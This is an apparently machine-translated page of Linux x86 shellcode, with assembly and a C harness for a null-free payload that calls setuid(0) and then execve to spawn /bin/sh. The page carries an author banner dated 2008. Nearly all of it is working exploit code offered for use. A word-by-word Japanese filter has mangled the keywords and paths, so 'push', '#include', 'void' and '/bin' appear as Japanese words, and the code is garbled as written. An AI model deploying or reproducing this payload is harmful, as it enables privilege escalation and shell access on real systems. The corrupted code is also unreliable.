このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。 |
-------------------[空対地ミサイル]---------------------- 全世界の _start section .text _start: ;setuid(0) xor ebx,ebx lea eax,[ebx+17h] cdq int 80h ;execve("/貯蔵所/sh",0,0) xor ecx,ecx 押し進める ecx 押し進める 0x68732f6e 押し進める 0x69622f2f lea eax,[ecx+0Bh] mov ebx,esp int 80h -------------------[/空対地ミサイル]---------------------- -------------------[C]---------------------- #含む "stdio.h" const char shellcode[]= "\x31\xdb" "\x8d\x43\x17" "\x99" "\xcd\x80" "\x31\xc9" "\x51" "\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69" "\x8d\x41\x0b" "\x89\xe3" "\xcd\x80"; int main() { printf < http://www.opengroup.org/onlinepubs/009695399/機能(する)/行事s/printf.html>("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE" "WITHOUT NULLS THAT SPAWNS A SHELL" "\n\nCoded by Chema Garcia (aka sch3m4)" "\n\t + sch3m4@opensec.es" "\n\t + http://opensec.es" "\n\n[+] Date: 29/11/2008" "\n[+] Thanks to: vlan7" "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1); (*(無効の (*)()) shellcode)(); return 0; }